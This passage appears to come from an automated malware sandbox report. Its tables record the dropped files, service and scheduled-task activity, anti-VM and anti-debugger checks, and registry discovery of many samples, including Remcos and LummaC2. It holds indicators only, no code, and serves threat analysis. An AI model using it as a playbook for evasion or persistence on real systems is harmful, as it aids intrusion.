| File created | C:\Windows\System32\svcldr64.dat | C:\Windows \System32\printui.exe | N/A |
| File created | C:\Windows\System32\libcurl.dll | C:\Windows \System32\printui.exe | N/A |
| File created | C:\Windows\System32\zlib1.dll | C:\Windows \System32\printui.exe | N/A |
| File created | C:\Windows\System32\libiconv-2.dll | C:\Windows \System32\printui.exe | N/A |
| File created | \??\c:\windows\system32\crypti.exe | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | \??\c:\windows\system32\winsvcf\winlogsvc | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\volsnap.inf_amd64_neutral_7499a4fac85b39fc\volsnap.PNF | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\usvcinsta64.exe | C:\Users\Admin\AppData\Local\Temp\Files\pyld611114.exe | N/A |
| File created | C:\Windows\System32\libssl-3-x64.dll | C:\Windows \System32\printui.exe | N/A |
| File created | C:\Windows\System32\libpq.dll | C:\Windows \System32\printui.exe | N/A |
| File created | C:\Windows\System32\libintl-9.dll | C:\Windows \System32\printui.exe | N/A |
| File created | C:\Windows\System32\console_zero.exe | C:\Windows \System32\printui.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | \??\c:\windows\system32\crypti.exe | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\System32\ucrtbased.dll | C:\Windows \System32\printui.exe | N/A |
| File created | C:\Windows\System32\x902135.dat | C:\Windows \System32\printui.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\Files\Office2024.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe | N/A |
| File created | C:\Windows\System32\bav64.exe | C:\Windows \System32\printui.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\System32\vcruntime140d.dll | C:\Windows \System32\printui.exe | N/A |
| File created | C:\Windows\System32\winsvcf\winlogsvc | C:\Windows \System32\printui.exe | N/A |
| File created | C:\Windows\System32\libcrypto-3-x64.dll | C:\Windows \System32\printui.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\System32\libwinpthread-1.dll | C:\Windows \System32\printui.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\game.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\lkyhjksefa.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\lkyhjksefa.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\4XYFk9r.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\Files\rorukal.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\Files\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\Files\t5abhIx.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISAB9511B1EE52494CA9BAED6A1536F012_1_0_6_1940.MSI | C:\Users\Admin\AppData\Local\Temp\Files\neofindsetup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISAB9511B1EE52494CA9BAED6A1536F012_1_0_6_1940.MSI | C:\Users\Admin\AppData\Local\Temp\Files\neofindsetup.exe | N/A |
| File opened for modification | \??\c:\program files\common files\microsoft shared\stationery\funletters\scenic\sunset1.jpg | C:\Users\Admin\AppData\Local\Temp\Files\sunset1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\PCI Manager\pcimgr.exe | C:\Users\Admin\AppData\Local\Temp\Files\nano.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\Files\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\Files\t5abhIx.exe | N/A |
| File opened for modification | \??\c:\program files\common files\microsoft shared\stationery\funletters\scenic\sunset-one.htm | C:\Users\Admin\AppData\Local\Temp\Files\sunset1.exe | N/A |
| File created | C:\Program Files (x86)\PCI Manager\pcimgr.exe | C:\Users\Admin\AppData\Local\Temp\Files\nano.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\Files\t5abhIx.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\wusa.lock | C:\Windows\system32\wusa.exe | N/A |
| File created | C:\Windows\wusa.lock | C:\Windows\system32\wusa.exe | N/A |
| File created | C:\Windows\AB9511B1EE52494CA9BAED6A1536F012.TMP\WiseCustomCalla.dll | C:\Windows\syswow64\MsiExec.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Local\Temp\RarSFX2\thkdh.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3553.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\ActivatedPopulation | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| File created | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\Files\t1.exe | N/A |
| File created | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\384522037.exe | N/A |
| File opened for modification | C:\Windows\ThatsConscious | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev1 | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\UnsignedProcedures | C:\Users\Admin\AppData\Local\Temp\Files\AnneSalt.exe | N/A |
| File opened for modification | C:\Windows\AccompaniedLongest | C:\Users\Admin\AppData\Local\Temp\Files\AnneSalt.exe | N/A |
| File opened for modification | C:\Windows\BadlyAssured | C:\Users\Admin\AppData\Local\Temp\Files\AnneSalt.exe | N/A |
| File opened for modification | C:\Windows\ItKinda | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| File created | C:\Windows\AB9511B1EE52494CA9BAED6A1536F012.TMP\WiseCustomCalla3.dll | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI38BE.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SkinHd | C:\Users\Admin\AppData\Local\Temp\Files\AnneSalt.exe | N/A |
| File opened for modification | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\Files\t1.exe | N/A |
| File opened for modification | C:\Windows\ConvertedTechnologies | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| File created | C:\Windows\AB9511B1EE52494CA9BAED6A1536F012.TMP\WiseCustomCalla2.dll | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev3 | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\volsnap.PNF | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\Installer\f7e34e6.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f7e34e6.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\VermontDisplaying | C:\Users\Admin\AppData\Local\Temp\Files\AnneSalt.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
Browser Information Discovery
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Files\pothjadwtrgh.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Files\3zv8x9q7.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Files\CnyvVl.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\fern_wifi_recon%252.34.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX2\thkdh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\835450\Mineral.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\softina.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\laz.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\pothjadwtrgh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\79556\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\123.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\177479\Community.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\AB9511B1EE52494CA9BAED6A1536F012.TMP\WiseCustomCalla2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\clip.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\needmoney.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\79556\Boxing.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\pei.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\octus.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\World%20of%20Tanks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-AMU4D.tmp\getlab.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\A.I_1003H.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\clsid.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\384522037.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\game.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\LummaC2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rmclient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\543648\Legend.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\lega.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\sysnldcvmr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\A.I.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S | C:\Users\Admin\AppData\Local\Temp\Files\output.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\Files\pothjadwtrgh.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\Files\pothjadwtrgh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\Files\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\Files\output.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\Files\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\Files\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\System32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\System32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1\Configuration Data | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\MultifunctionAdapter\1\KeyboardController | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\Files\octus.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSerialNumber | C:\Users\Admin\AppData\Local\Temp\Files\octus.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 | C:\Windows\system32\csrss.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Windows\system32\csrss.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Windows\system32\csrss.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\Component Information | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0\Component Information | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Roaming\ff5c5ee747fc\feburary.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\Identifier | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\MultifunctionAdapter\0\KeyboardController\0 | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0\Identifier | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1\Component Information | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\MultifunctionAdapter\0\KeyboardController | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2\Identifier | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\Identifier | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0 | C:\Users\Admin\AppData\Local\Temp\Files\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\Configuration Data | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\Component Information | C:\Windows\system32\csrss.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1\Identifier | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2\Component Information | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation | C:\Users\Admin\AppData\Local\Temp\Files\output.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Windows\system32\csrss.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Windows\system32\csrss.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2\Configuration Data | C:\Windows\system32\csrss.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Windows\system32\csrss.exe | N/A |
